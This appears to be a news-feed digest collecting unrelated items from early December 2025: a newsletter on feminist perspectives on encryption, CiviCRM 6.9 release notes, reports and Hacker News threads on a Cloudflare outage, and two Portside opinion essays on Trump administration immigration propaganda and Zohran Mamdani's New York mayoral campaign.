Encryption and Feminism: We’re Briging The Conversation Online

Internet Exchange
internet.exchangepoint.tech
2025-12-04 15:25:51
A follow-up to our Mozilla Festival session on Encryption and Feminism: Reimagining Child Safety Without Surveillance....
Original Article
privacy and security

A follow-up to our Mozilla Festival session on Encryption and Feminism: Reimagining Child Safety Without Surveillance.

Encryption and Feminism: We’re Briging The Conversation Online
Gerda Binder, Hera Hussain, Georgia Bullen, Audrey Hingle, Lucy Purdon, and Mallory Knodel in our MozFest session.

By Audrey Hingle

Our MozFest session on Encryption and Feminism: Reimagining Child Safety Without Surveillance was bigger than a one-hour festival slot could contain. The room filled fast, people were turned away at the door, and the Q&A could have gone on twice as long. Many attendees told us afterwards that this is the conversation they’ve been waiting to have. That feminist perspectives on encryption aren’t just welcome, they’re needed. So we’re opening the circle wider and taking it online so more people can join in.

In the room, we heard reflections that reminded us why this work matters. In feedback forms, attendees told us encryption isn’t only a security feature, it’s “part of upholding the rights of kids and survivors too, now let’s prove that to the rest of the world!” Another participant said they left ready to “be a champion of encryption to protect all.” Someone else named what many feel: “More feminist spaces are needed!”

It quickly became clear that this work is collective. It’s about shifting assumptions, building new narratives, and demanding technology that does not treat privacy as optional or as something only privacy hardliners or cryptography experts care about. Privacy is safety, dignity, and a precondition for seeking help. It is necessary to explore identity, form relationships, and grow up. Privacy is a human right.

We also heard calls for clarity and practicality: to reduce jargon, show people what encryption actually does, and push for privacy-preserving features more generally like screenshot protection and sender-controlled forwarding.

Participants also reminded us that encryption must account for disparity and intersectionality. Surveillance is not experienced equally. Some communities never get to “opt in” or consent at all. Feminist principles for encryption must reflect that reality.

And importantly, we heard gratitude for the tone of the session: open, candid, grounded, and not afraid to ask hard questions. “Normalize the ability to have tricky conversations in movement spaces,” someone wrote. We agree. These conversations shouldn’t only happen at conferences, they should live inside policy rooms, product roadmaps, activist communities, parenting forums, classrooms.

So let’s keep going.

New Virtual Session: Encryption and Feminism: Reimagining Child Safety Without Surveillance

🗓️ Feb 10, 4PM GMT, Online

Whether you joined us at MozFest, could't make it to Barcelona, or were one of the many who could not get into the room, this session is for you. We are running the event again online so more people can experience the conversation in full. We will revisit the discussion, share insights from the panel, and walk through emerging Feminist Encryption Principles, including the ideas and questions raised by participants.

Speakers will include Chayn’s Hera Hussain , Superbloom’s Georgia Bullen , Courage Everywhere’s Lucy Purdon , UNICEF’s Gerda Binder , and IX’s Mallory Knodel, Ramma Shahid Cheema and Audrey Hingle.

Help us grow this conversation. Share it with friends and colleagues who imagine a future where children are protected without surveillance and where privacy is not a privilege, but a right.

We hope you’ll join us!

Related : If you care about privacy-preserving messaging apps, Phoenix R&D is inviting feedback through a short survey asking for input on what features matter most for those in at-risk contexts.


Hidden Influences: How algorithmic recommenders shape our lives by Dr. Luca Belli

New book from IX client Dr. Luca Belli looks at how recommender systems function, how they are measured, and why accountability remains difficult. Luca draws on his experience co-founding Twitter’s ML Ethics, Transparency and Accountability work, contributing to standards at NIST, and advising the European Commission on recommender transparency.

Now available via MEAP on Manning. Readers can access draft chapters as they are released, share feedback directly, and receive the final version when complete. Suitable for researchers, policy teams, engineers, and anyone involved in governance or evaluation of large-scale recommendation systems. It is also written for general readers, with no advanced technical knowledge required, so when you're done with it, hand it to a curious family member who wants to understand how algorithms decide what they see.

Support the Internet Exchange

If you find our emails useful, consider becoming a paid subscriber! You'll get access to our members-only Signal community where we share ideas, discuss upcoming topics, and exchange links. Paid subscribers can also leave comments on posts and enjoy a warm, fuzzy feeling.

Not ready for a long-term commitment? You can always leave us a tip .

Become A Paid Subscriber


Internet Governance

Digital Rights

Technology for Society

Privacy and Security

Upcoming Events

Careers and Funding Opportunities

United States

Global

What did we miss? Please send us a reply or write to editor@exchangepoint.tech .

CiviCRM 6.9 Release

CiviCRM
civicrm.org
2025-12-04 12:01:14
Thanks to the hard work of CiviCRM’s incredible community of contributors, CiviCRM version 6.9.0 is now ready to download. This is a regular monthly release that includes new features and bug fixes. Details are available in the monthly release notes. Your are encouraged to upgrade now f...
Original Article

Thanks to the hard work of CiviCRM’s incredible community of contributors, CiviCRM version 6.9.0 is now ready to download. This is a regular monthly release that includes new features and bug fixes. Details are available in the monthly release notes .

Your are encouraged to upgrade now for the most stable, secure CiviCRM experience:

Download CiviCRM

Users of the CiviCRM Extended Security Releases (ESR) do not need to upgrade. The current version of ESR is CiviCRM 6.4.x.

Support CiviCRM

CiviCRM is community driven and is sustained through code contributions and generous financial support.

We are committed to keeping CiviCRM free and open, forever . We depend on your support to help make that happen. Please consider supporting CiviCRM today .

Big thanks to all our partners , members , ESR subscribers and contributors who give regularly to support CiviCRM for everyone.

Credits

AGH Strategies - Alice Frumin; Agileware Pty Ltd - Iris, Justin Freeman; akwizgran; ALL IN APPLI - Guillaume Sorel; Artful Robot - Rich Lott; BrightMinded Ltd - Bradley Taylor; Christian Wach; Christina; Circle Interactive - Dave Jenkins, Rhiannon Davies; CiviCoop - Jaap Jansma, Erik Hommel; CiviCRM - Coleman Watts, Tim Otten, Benjamin W; civiservice.de - Gerhard Weber; CompuCo - Muhammad Shahrukh; Coop SymbioTIC - Mathieu Lutfy, Samuel Vanhove, Shane Bill; cs-bennwas; CSES (Chelmsford Science and Engineering Society) - Adam Wood; Dave D; DevApp - David Cativo; Duncan Stanley White; Freeform Solutions - Herb van den Dool; Fuzion - Jitendra Purohit, Luke Stewart; Giant Rabbit - Nathan Freestone; Greenpeace Central and Eastern Europe - Patrick Figel; INOEDE Consulting - Nadaillac; JacquesVanH; JMA Consulting - Seamus Lee; Joinery - Allen Shaw; Lemniscus - Noah Miller; Makoa - Usha F. Matisson; Megaphone Technology Consulting - Jon Goldberg; MJW Consulting - Matthew Wire; Mosier Consulting - Justin Mosier; Nicol Wistreich; OrtmannTeam GmbH - Andreas Lietz; Progressive Technology Project - Jamie McClelland; Progressive Technology Project - Jamie McClelland; Richard Baugh; Skvare - Sunil Pawar; Sarah Farrell-Graham; Squiffle Consulting - Aidan Saunders; Tadpole Collective - Kevin Cristiano; Wikimedia Foundation - Eileen McNaughton; Wildsight - Lars Sander-Green

New Extensions

  • Membership AJAX Permissions - This CiviCRM extension modifies the API permissions to allow it to be called with just the "Access AJAX API" permission instead of requiring the more restrictive default permissions.
  • civiglific - Integrates Glific ( https://glific.org ) with CiviCRM to sync contact groups and send automated WhatsApp messages and receipts to contributors.
  • Reply to Inbound Email - Makes it easier to reply to email, quote the original, etc.

View all latest extensions

The US polluters that are rewriting the EU's human rights and climate law

Hacker News
www.somo.nl
2025-12-05 09:58:01
Comments...

Cloudflare down, websites offline with 500 Internal Server Error

Bleeping Computer
www.bleepingcomputer.com
2025-12-05 09:12:15
Cloudflare is down, as websites are crashing with a 500 Internal Server Error. Cloudflare is investigating the reports. [...]...
Original Article

Cloudflare

Cloudflare is down, as websites are crashing with a 500 Internal Server Error. Cloudflare has confirmed that it's investigating the reports.

Cloudflare, a service that many websites use to stay fast and secure, is currently facing problems.

Because of this, people visiting some websites are seeing a “500 Internal Server Error” message instead of the normal page.

Cloudflare down
Cloudflare outage takes down DownDetector

A 500 error usually means something went wrong on the server side, not on the user’s device or internet connection.

In an update to its status page, Cloudflare says it's investigating issues with Cloudflare Dashboard and related APIs.

"Customers using the Dashboard / Cloudflare APIs are impacted as requests might fail and/or errors may be displayed," the company noted.

Cloudflare says it has implemented a fix, and websites should start coming back online soon.

This is a developing story....

tines

Break down IAM silos like Bitpanda, KnowBe4, and PathAI

Broken IAM isn't just an IT problem - the impact ripples across your whole business.

This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.

Cloudflare Is Down

Hacker News
cloudflare.com
2025-12-05 08:59:00
Comments...
Original Article

Our connectivity cloud is the best place to
  • connect your users, apps, clouds, and networks
  • protect everything you connect to the Internet
  • build and scale applications

Over 60 cloud services on one unified platform, uniquely powered by a global cloud network. We call it the connectivity cloud.

Connect your people, apps and AI agents

Modernize your network and secure your workspace against unauthorized access, web browsing attacks and phishing. Accelerate your journey to Zero Trust with our SASE platform today.

Speak to sales about SASE to modernize your network and secure your workspace.

No options

Select your job level... *

No options

Select your job function... *

No options

Bolivia, Plurinational State of

Bonaire, Sint Eustatius and Saba

British Indian Ocean Territory

Congo, the Democratic Republic of the

Falkland Islands (Malvinas)

French Southern Territories

Heard Island and McDonald Islands

Holy See (Vatican City State)

Lao People's Democratic Republic

Macedonia, the former Yugoslav Republic of

Saint Helena, Ascension and Tristan da Cunha

Saint Martin (French part)

Saint Pierre and Miquelon

Saint Vincent and the Grenadines

Sint Maarten (Dutch part)

South Georgia and the South Sandwich Islands

Tanzania, United Republic of

Venezuela, Bolivarian Republic of

Learn more

Related

Protect and accelerate websites and AI-enabled apps

Use our industry-leading WAF, DDoS, and bot protection to protect your websites, apps, APIs, and AI workloads while accelerating performance with our ultra-fast CDN. Get started in 5 minutes.

Related

Build and secure AI agents

Agents are the future of AI, and Cloudflare is the best place to get started. Use our agents framework and orchestration tools to run the models you choose and deliver new agents quickly. Build, deploy, and secure access for remote MCP servers so agents can access the features of your apps.

Related

One global cloud network unlike any other

Only Cloudflare offers an intelligent, global cloud network built from the ground up for security, speed, and reliability.

60+

cloud services available globally

234B

cyber threats blocked each day

20%

of all websites are protected by Cloudflare

330+

cities in 125+ countries, including mainland China

Cloudflare Stats

Leading companies rely on Cloudflare

Connect

Protect

Build

How Cloudflare can help

Performance acceleration bolt

Accelerate website performance

Security shield protection

Block bot traffic

Block bot traffic

Stop bot attacks in real time by harnessing data from millions of websites protected by Cloudflare.

Optimize Video Experience

Optimize video experiences

Deploy Severless Code Icon

Deploy serverless code

Deploy serverless code

Build serverless applications and deploy instantly across the globe for speed, reliability, and scale.

Deploy AI on the Edge Icon

Deploy AI on the edge

Eliminate Egress Fee for Object Storage

Eliminate egress fee for object storage

News and resources

What's new

Insights

Library

Events

Get started with the connectivity cloud

Security Shield Protection Icon

Get started for free

Get easy, instant access to Cloudflare security and performance services.

Start for free
Constellation Icon

Need help choosing?

Get a personalized product recommendation for your specific needs.

Find the right plan
Innovation Thinking Icon

Talk to an expert

Have questions or want to get a demo? Get in touch with one of our experts.

Contact us

Is Cloudflare Down Again? Also, DownDetector/Claude.ai/LinkedIn?

Hacker News
news.ycombinator.com
2025-12-05 08:55:47
Comments...
Original Article
Is Cloudflare Down Again? Also, DownDetector/Claude.ai/LinkedIn?
18 points by dfasoro 30 minutes ago | hide | past | favorite | 4 comments

I was writing a blogpost on Medium and I noticed errors, tried to open LinkedIn? down. tried downdetector? down. Claude.ai is also down



I'm getting a lot of errors on a lot of pages from cf.



Yep, just went back up and then down again. Let's not put all eggs in one basket...


Cloudflare RIP

Cloudflare Down Again – and DownDetector Is Also Down

Hacker News
news.ycombinator.com
2025-12-05 08:51:42
Comments...
Original Article

https://downdetectorsdowndetectorsdowndetectorsdowndetector.... reports that https://downdetectorsdowndetectorsdowndetector.com/ is down, guessing downdetectorsdowndetectorsdowndetector runs via cloudflare!



This is art



You know what, maybe AI is taking all the goddamn jobs


They pretty much said this. All the big companies that had recent outages are companies that publicly embraced vibe coding.



Time to use some local ai with Docker Model Runner :)

No cloudflare no problem

https://github.com/docker/model-runner


I assume this is why Claude stopped working


There are other LLMs you can ask to be absolutely, 100% sure.


downdetectors downdetector shows that downdector should not be down. Something is wrong here.

https://downdetectorsdowndetector.com/



Crunchyroll down too got me and the anime community stressed


LinkedIn down


i can confirm it down again



jesus fucking christ i just wanna play runescape


This made getting paged at 4am worth it

New Anonymous Phone Service

Schneier
www.schneier.com
2025-12-05 08:08:21
A new anonymous phone service allows you to sign up with just a zip code....

Sabrina Carpenter and the Cruel Authoritarianism of Trump

Portside
portside.org
2025-12-05 06:21:13
Sabrina Carpenter and the Cruel Authoritarianism of Trump jay Fri, 12/05/2025 - 01:21 ...
Original Article

The Trump White House just showed us something every American should find chilling, no matter what music they listen to or what party they vote for.

They took a video of aggressive ICE arrests, slapped Sabrina Carpenter’s song on top of it, and posted it like it was a victory lap. Then, when Carpenter objected and said the video was “evil and disgusting” and told them not to use her music to benefit an “inhumane agenda,” the White House hit back with a statement that sounded like it came from a playground bully, not the seat of American government.

They didn’t debate her point. They didn’t defend policy with facts. They went straight to dehumanization and insult, calling people “illegal murderers, rapists, and pedophiles,” and saying anyone who defends them must be “stupid” or “slow.”

That’s not just ugly: it’s a warning.

Because the biggest story here is not a celebrity clapback; it’s that the White House is using the power of the state to turn human beings into a violence-normalizing punchline, and using America’s culture as a weapon to spread it.

This is what rising authoritarianism looks like in the age of social media.

A democracy survives on shared reality and shared humanity. It survives when the government understands that it works for the people and must be accountable to the Constitution, to due process, and to basic human decency.

But what happens when a government starts producing propaganda like it’s a teenage streamer chasing clicks and the president runs the White House like it’s a reality show operation, right down to the televised Cabinet meetings?

We get a machine that can normalize cruelty. We get a public trained to cheer at humiliation. We get outrage as entertainment. And we get the steady erosion of our ability to ask the most important questions in a free society.

Was this legal? Was it justified? Was it proportional? Was it humane? Were innocent people caught up? Were families separated? Was there due process? Is it even constitutional?

Those questions disappear when the government turns an ICE arrest into a meme.

There are, of course, serious crimes in every society and violent criminals should be held accountable under the law. But that isn’t what the White House statement was doing. It was, instead, engaged in something far more ancient, cynical, and dangerous.

It was trying to paint everyone in that video with the worst label imaginable so the public stops caring about what happens next.

That’s how they get permission — both explicit and implicit — for abuses.

If the audience for Trump’s sick reality show is told, “These are monsters,” then — as we’ve most recently seen both with ICE here domestically and with people in small boats off the coast of Venezuela — any cruelty becomes acceptable.

Any killing becomes a shrug. Overreach becomes a punchline. And following the rule of law becomes something we apply to our friends while we throw it away for people we have been taught to hate.

That is exactly why authoritarians always start by dehumanizing a target group.

And it always spreads.

Trump started by demonizing and then going after immigrants. Then he demanded fealty (and millions of dollars) from journalists, universities, and news organizations. He demonizes his political opponents to the point they suffer death threats, attacks, and assassinations. And if Trump keeps going down this same path — as Pastor Niemöller famously warned the world — it’ll next be you and me.

Consider this regime’s cultural warfare program. The White House has reportedly used music from multiple artists without permission and now brags that they’ve used those creators’ work to bait outrage, to “own the libs.”

All to drive attention, create spectacle, and turn governance into a constant fight as they punish anyone in public life — today it’s Sabrina Carpenter — who dares to speak up.

This is intimidation pretending to be a joke. If you’re an artist, a teacher, an organizer, or just a person with a platform, the message is simple: “We can drag you into our propaganda machine whenever we want, and if you object we’ll mock you and send an online — and often physical — mob after you.”

That’s a chilling reality, and it matters in a democracy. People start to think twice before speaking. They start to retreat. They start to self censor.

And that’s the Trump regime’s first goal.

Then there’s the distraction, particularly from a cratering economy and Trump’s association with Epstein and Maxwell.

With this strategy, borrowed from the Nazis (as my guest on the radio show Monday, Lawrence Reese, noted in his book The Nazi Mind: 12 Warnings From History ), culture war isn’t a sideshow anymore, it’s part of a larger strategy.

When the government posts a meme like the one where ICE used Carpenter’s music, it isn’t trying to inform us: it’s trying to trigger us. It’s trying to bait us into amplifying the clip, fighting over the celebrity angle, and losing sight of the real issue.

And that real issue is Trump’s and the GOP’s insatiable lust for state power and the wealth that power can allow, bring, and protect.

Armed agents. Detention. Deportation. Families. Fear. Mistakes that can’t be undone. Human beings who can be disappeared from their communities with the tap of a button and a viral soundtrack. Or killed by “suicide” in a jail cell when they threaten to go public.

If we care about freedom, we can’t just stand by and say nothing while this regime turns ICE’s violence into content.

Because once a government learns it can win political points by broadcasting humiliation, it’ll do it again. And it’ll escalate. It’ll push the line farther and farther until we wake up one day and wonder how we got here.

So what do we do?

First , stop amplifying their propaganda on their terms. Don’t share their clips as entertainment, even to condemn them without context (no links in this article). When you must talk about it, talk about the power being abused, not the celebrity drama.

Second , demand oversight. Call your members of Congress (202-224-3121). Demand hearings on ICE media practices and the use of official government accounts and our tax dollars to promote dehumanizing propaganda. Demand transparency on how these videos are produced, approved, and distributed.

Third , support civil liberties groups and immigrant rights organizations that challenge abuses in court and document what’s happening on the ground. Democracy requires watchdogs like them when the people in power act like they’re above the law.

Fourth , get inside the Democratic Party and vote — and help others vote — like it matters, because it does. Local prosecutors, sheriffs, governors, attorneys general, and members of Congress all shape how far this culture of cruelty can spread. Authoritarians rely on fatigue and cynicism: Don’t give them either: participate.

And finally, speak up. Sabrina Carpenter did, and she was right to. Not because she’s a pop star, but because she named the moral truth that the White House is trying to smother with what they pretend are jokes.

When a government starts celebrating the humiliation of vulnerable people, it’s telling the world that it no longer sees itself as the servant of a democratic republic. Of all the people. Instead, it now sees itself as the applause-hungry enforcer of a bloodthirsty tribe.

If we let this become normal, we will — one day soon — no longer recognize our country.

This is the moment to draw a line.

Not just for immigrants. Not just for artists. For the Constitution. For due process. For human dignity. For the idea that in America, power is accountable.

Call. Organize. Vote. Let’s not let cruelty become America’s official language.

The Hidden History of Monopolies: How Big Business Destroyed the American Dream " (2020); " The Hidden History of the Supreme Court and the Betrayal of America " (2019); and more than 25 other books in print.]

Partyism Without the Party

Portside
portside.org
2025-12-05 06:08:02
Partyism Without the Party jay Fri, 12/05/2025 - 01:08 ...
Original Article

When was the last time being on the left was fun? Even in the best of times, supporting socialism in America can feel like performing a grim duty in the face of almost certain disappointment. The chapter titles in Burnout , Hannah Proctor’s investigation of the emotional landscapes of leftist militancy, are revealing: Melancholia, Nostalgia, Depression, Burnout, Exhaustion, Bitterness, Trauma, Mourning. One of the many virtues of Zohran Mamdani’s remarkable campaign for New York City mayor was that it never felt this way, not even when he was sitting near the bottom of the polls. It was a year-long act of collective joy. Real joy—not the brief sugar high that surged when Kamala Harris replaced Joe Biden at the top of the Democrats’ 2024 ticket. Volunteering for Mamdani never felt like a chore, even when the weather was bad and fewer canvassers showed up for their shift than expected. It was a blast from start to finish, and we didn’t even have to console ourselves with a moral victory. This time, we actually won.

We tend to speak of voting as a civic duty, and of boosting voter participation as a high-minded, “good government” concern. The nature of mass politics, however, has often been anything but staid and responsible. Michael McGerr begins his book The Decline of Popular Politics with a colorful account of a Democratic Party “flag raising” in New Haven in 1876. It was a raucous affair, complete with torchlight parades, street corner speeches, brass bands, fireworks, and rivers of booze courtesy of local party notables. Political spectacle hasn’t gone away, but since the advent of modern communications technology it has become enormously mediated. By contrast, historian Richard Bensel has described the “sheer physicality of voting” and party politics in the nineteenth century. People flocked to the polls, Bensel writes, “simply because they were exciting, richly endowed with ethno-cultural themes of identity, manhood, and mutual recognition of community standing.” It was party politics, in both senses of the word.

This era should not be romanticized. Aside from the fact that only men could vote, the atmosphere of drink-soddened masculinity that pervaded election campaigns kept most women away even when it did not descend into partisan and racial violence. Even so, it is hard not to agree with political scientists Daniel Schlozman and Sam Rosenfeld that America’s early mass parties “bequeathed a genuinely popular and participatory” culture whose “promise still haunts American politics.”

Much has been made of Mamdani’s extremely effective use of social media, short-form video, and other digital formats that speak to the younger and disengaged voters many other campaigns struggle to reach. There’s no doubt this was a major ingredient in the campaign’s success; historically high rates of participation among Gen Z and newly registered voters testify to its effectiveness. But the sheer physicality of the Mamdani campaign, and the ways it used digital media to bring people together offline, has been underrated.

Consider the citywide scavenger hunt in August. A call went out over social media on a Saturday night, and thousands of people showed up the next morning to race around seven stops across the boroughs, each one connected to the city’s history. Disgraced incumbent mayor Eric Adams denounced the frivolity: “I’m sure a scavenger hunt was fun for the people with nothing better to do. . . . Mamdani is trying to turn our city into the Squid Games.” One competitor offered a different perspective : “I think actually trying to have fun in politics and do a little bit of a community building exercise, a way to actually learn about our city—I’ve never known another politician to do it.”

The scavenger hunt was just one example of the campaign’s popular and participatory culture. So much of the campaign was in public and in person: mass rallies, a walk through the entire length of Manhattan, unannounced appearances at clubs and concerts, a 100,000-strong army of volunteers who braved countless walk-ups to knock over 1 million doors. From early spring through November’s general election, the campaign assumed the scale and spirit of a social movement, or a Knicks playoff run. There was a palpable buzz around the city—not just in what New York electoral data maven Michael Lange termed the “ Commie Corridor ” neighborhoods, populated by young college-educated leftists, but in Little Pakistan, Little Bangladesh, Parkchester, and other places where nary a New Yorker tote bag can be found.

When the polls closed, more than 2 million voters had cast their ballots, the highest turnout in a New York City mayoral election since 1969. More than 1 million voters, just over half the electorate, voted for Mamdani. At the same time, over 850,000 voted for Andrew Cuomo, who successfully consolidated many Republican voters behind his second-effort bid to return to public office. Another 146,000 voted for the official Republican candidate, the perennial also-ran Curtis Sliwa.

Mamdani’s shockingly decisive win in the Democratic primary had been powered by his core constituencies: younger voters, college-educated renters, and South Asian and Muslim voters, many of whom participated in the electoral process for the first time. He carried these constituencies with him into the general election, but he may have struggled to win the final contest without rallying large numbers of working-class Black and Hispanic voters too. As Lange has shown , the areas that shifted most strongly toward Mamdani from the primary to the general election were Black and Hispanic neighborhoods in the Bronx, Brooklyn, and Queens. Many Black and Hispanic voters under forty-five were already in Mamdani’s column in the primary, but his numbers then were far lower among their parents and grandparents. After securing the Democratic nomination, his campaign made inroads by building relationships with Black church congregations and community organizations, as well as labor unions with disproportionately Black and Hispanic memberships. By cobbling these disparate constituencies together in the general election, Lange concluded, Mamdani successfully renewed the promise of the Rainbow Coalition for the twenty-first century.


Not By Bread-and-Butter Alone

Explaining how Mamdani did this has become something of a Rorschach test for pundits. Much of the commentary has focused on his campaign’s affordability agenda, which targeted the city’s cost-of-living crisis through proposals for freezing rents, eliminating fares on city buses, and implementing universal child care, among others. While Mamdani’s emphasis on affordability was necessary for securing the victory, and his economic proposals were popular across his constituencies, he would not have been able to mobilize the coalition he did on the strength of bread-and-butter appeals alone. Mamdani’s unequivocal stances on “non-economic” questions like the genocide in Gaza or the ICE raids terrorizing immigrant communities built trust among precisely the people he needed to join his volunteer army or turn out to vote for the first time.

Support for Palestine dovetailed with Mamdani’s vocal opposition to the Trump administration’s assault on immigrants, which came together in an impromptu confrontation with Trump’s “border czar” Tom Homan last March. A video of the encounter , in which Mamdani challenged Homan over the illegal detention of Palestinian solidarity activist Mahmoud Khalil, circulated widely on social media and in immigrant communities. All of this helped Mamdani link his economic program with opposition to the president’s authoritarian lurch. In doing so, he appealed to immigrant voters worried about both ICE raids and making the rent, as well as voters who want their representatives to stand up to masked federal agents snatching people off the streets and whisking them away in unmarked cars. Moreover, Mamdani’s identity as a Muslim of South Asian descent undoubtedly activated demobilized voters excited by the idea of seeing someone like them in Gracie Mansion. The historic turnout surge that swept Muslim and South Asian neighborhoods in the outer boroughs is inseparable from Mamdani’s faith, his cultural fluency, and his outspoken defense of fellow Muslims against the Cuomo campaign’s Islamophobic bigotry.

The New York City chapter of the Democratic Socialists of America (NYC-DSA) has received a lot of credit for Mamdani’s victory, and rightfully so. Mamdani is a DSA member, as are his chief of staff, field director, and other key advisers. The campaign’s field leads, who organized canvassing shifts, were disproportionately members (I co-led a weekly canvass in my Brooklyn neighborhood during the primary). But organizations rooted in South Asian and Muslim communities deserve their fair share of the credit, including Desis Rising Up and Moving (DRUM) Beats, the Muslim Democratic Club of New York, Bangladeshi Americans for Political Progress, and grassroots affinity groups like Pakistanis for Zohran and Bangladeshis for Zohran. The mobilization of these communities transformed the electorate and helped Mamdani offset Cuomo’s strength in neighborhoods that shifted sharply to the former governor in the general election.

There are nearly 1 million Muslims in New York, but until Mamdani’s campaign they were a sleeping giant in local politics. Roughly 350,000 Muslims were registered, but only 12 percent of registered Muslims turned out to vote in the 2021 mayoral election. Mamdani’s campaign turned this dynamic completely on its head. DRUM Beats, which has organizing bases in the Bronx, Brooklyn, and Queens spanning a range of South Asian and Indo-Caribbean diasporic communities, played a key role. Their organizers are committed and tenacious, and many of them are women. “We’re like a gang,” the group’s organizing director Kazi Fouzia told a Politico reporter last summer. “When we go to any shop, people just move aside and say, ‘Oh my god. The DRUM leaders are here. The DRUM women are here.’” When Mamdani recognized “every New Yorker in Kensington and Midwood” in his victory speech, he had in mind the scores of aunties who ran themselves ragged knocking doors, sending texts, and making phone calls.

In their post-election analysis of the voting data, DRUM Beats detailed an enormous increase in turnout in the communities they organize. Based on Board of Elections data and their own models, they estimated that from 2021 to 2025 South Asian turnout exploded from 15.3 percent to nearly 43 percent, while Muslim turnout went from barely 15 percent to over 34 percent. While representing just 7 percent of New York’s registered voters, they accounted for an estimated 15 percent of actual voters in the general election. Nearly half of the city’s registered Bangladeshi and Pakistani American voters participated in the election, outpacing the overall participation rate of roughly 42 percent. This historic development didn’t materialize out of thin air. Mamdani’s faith, identity, and raw talent certainly didn’t hurt, but people on the ground have been quietly building civic infrastructure in these neighborhoods. In his assessment of the South Asian surge, electoral strategist Waleed Shahid noted that the places with the biggest gains were precisely “the places where DRUM Beats and allied organizers have spent years knocking doors, translating ballot measures, convening tenant meetings in basement prayer rooms, and building lists through WhatsApp groups and WhatsApp rumors alike.” I had the good fortune of getting to know some of these organizers during the campaign. Their capacity to mobilize working-class immigrants who had been overlooked for too long is formidable, and Mamdani’s victory cannot be explained without it.

Mamdani claimed the legacy of Fiorello La Guardia and Vito Marcantonio in the campaign’s final days, and the historical resonances ran deep. Shahid drew a parallel between the current moment and earlier realignments in the city’s political history “when groups written off as threatening or foreign became disciplined voting blocs: Irish Catholics moving from despised outsiders to Tammany’s core; Jewish and Italian workers turning the Lower East Side into a labor/socialist stronghold.” I am a product of New York’s twentieth-century Italian American diaspora myself. In rooms full of South Asian aunties for Zohran, wearing headscarves and plying everyone with plates of food, I saw people who in a different time could have been my own relatives stumping for the Little Flower, the legendary figure who was once told New York wasn’t ready for an Italian mayor. Turns out it was ready for an Italian mayor then, and it’s ready for a Muslim mayor now.

A Test for Partyism

Donald Trump’s return to the presidency set off a war of white papers on Democratic Party electoral strategy that shows few signs of a ceasefire. There are a variety of strategic prescriptions, but many of them fall into two broad and infelicitously named camps: popularists and deliverists. Popularists tend to hail from the party’s moderate wing, but not always. There is a leftist variety of popularism, for example, that finds expression in projects like the Center for Working-Class Politics. Ezra Klein has offered perhaps the clearest definition of the popularist persuasion: “Democrats should do a lot of polling to figure out which of their views are popular and which are not popular, and then they should talk about the popular stuff and shut up about the unpopular stuff.” Deliverism, by contrast, focuses less on campaigning and more on governing. As Matt Stoller summarized it in a tweet: “deliver and it helps you win elections. Don’t deliver and you lose.” When Democrats are in power, they should implement bold policies that improve people’s lives and then reap the rewards from a satisfied electorate.

There is an element of “duh, of course” to both schools of thought, but the weaknesses are easy to spot. Popularism seeks to mirror the current state of public opinion for the sake of electoral success, but public opinion is malleable and sometimes quite fickle. One need only look at the wildly fluctuating data on immigration attitudes since the 2024 election to see how quickly chasing public opinion can become a fool’s errand. Deliverism, by contrast, presumes “a linear and direct relationship between economic policy and people’s political allegiances,” as Deepak Bhargava, Shahrzad Shams, and Harry Hanbury put it . But that’s not typically how real people operate. The Biden administration was, in many respects, an experiment in deliverism that failed to deliver. It implemented policies that brought tangible benefits to millions of people but still couldn’t prevent Trump from returning to the White House.

The limitations of both popularism and deliverism have opened space for a new school of thought, one that tackles strategic electoral questions from a different angle (but also has a terrible name): partyism. The political scientist Henry Farrell has usefully summarized its premises: the Democratic Party’s fundamental problem is not its ideological positioning but the fact that it’s not a political party in any real sense. “If Democrats want to succeed,” Farrell writes, they need to “build up the Democratic party as a coherent organization that connects leaders to ordinary people.” In their book The Hollow Parties , Daniel Schlozman and Sam Rosenfeld trace how the Democratic and Republican parties alike have been transformed into rival “blobs” of consultants, donors, strategists, and interest groups. Their critique has been influential, and it has informed a spate of proposals for turning the Democratic Party into a network of civic institutions that engages voters between elections and mediates effectively between leaders and the base.

The Mamdani campaign was arguably the first major test of the partyist approach in practice. While there is no indication that campaign leaders and strategists consciously appropriated these ideas, it is not difficult to see the affinities between them. The campaign brought new and disengaged voters into the fold through novel activities like the scavenger hunt and the Cost of Living Classic, a citywide soccer tournament held in Coney Island. Its sinew and muscle came not from TikTok or Instagram, but rooted civic organizations like NYC-DSA, DRUM Beats, United Auto Workers Region 9A, and the mosques, synagogues, and churches that opened their doors to the candidate. Even four of the five Democratic Party county committees in the city endorsed him, despite their historic wariness of insurgent candidates from the democratic socialist left (only the Queens county committee, a stronghold of dead-end Cuomo supporters, snubbed him). Mamdani’s victory was based, to a significant extent, on organizations with real members who engage in meaningful civic and political activity.

Of all the organizations listed above, however, the least important by far are the official bodies of the Democratic Party. The Mamdani campaign may have embodied an emergent partyist politics, but this is a partyism without the party. NYC-DSA’s electoral strategy, for example, is grounded in the concept of the “party surrogate” first proposed by Jacobin ’s Seth Ackerman and developed further by the political scientist Adam Hilton and others. Given the daunting odds of successfully establishing any new party, Hilton proposes a network of chapter-based organizations “oriented toward building a base within working-class communities and labor unions that can also act as an effective independent pressure group on the Democratic Party.” This is precisely what Mamdani and other socialist candidates have done. Primary voters—not party organizations—decide candidate nominations, which radically reduces the incentives for transforming those organizations. Why fill in the hollow parties when you can do much the same thing outside of them?

For now, at least, partyist projects like the one that catapulted Mamdani into political stardom will continue to gestate outside of any formal party organization. The NYC-DSA chapter has doubled in size to 13,000 members since 2024, and that number will likely continue to grow. Organizers have established a new organization called Our Time that is focused on mobilizing campaign volunteers in support of Mamdani’s agenda after he is sworn into office. NYC-DSA, DRUM Beats, labor unions, tenant groups, and other organizations that endorsed Mamdani during the campaign have established a formal coalition called the People’s Majority Alliance to do much the same thing at the organizational leadership level. So it seems unlikely that Mamdani’s coalition will demobilize the way Barack Obama’s did after 2008. These are independent organizations, constituted outside of official Democratic Party institutions, that assume the base-building and mobilization functions a party would carry out directly in most other political systems. This is the form popular and participatory politics takes in the age of hollow parties, raising the possibility that a lost culture once sustained by precinct captains, ward heelers, and saloon keepers could be reborn in a new way.

Rolling back MAGA will require speaking to popular needs and aspirations and delivering on them. It will also require developing our capacities to work together in a spirit of democratic cooperation and public exuberance. The Mamdani campaign laid the foundations for this in one city, but here and elsewhere much more reconstruction remains to be done.

[ Chris Maisano is a trade unionist and Democratic Socialists of America activist. He lives in Brooklyn, New York.]

TIL: Subtests in pytest 9.0.0+

Simon Willison
simonwillison.net
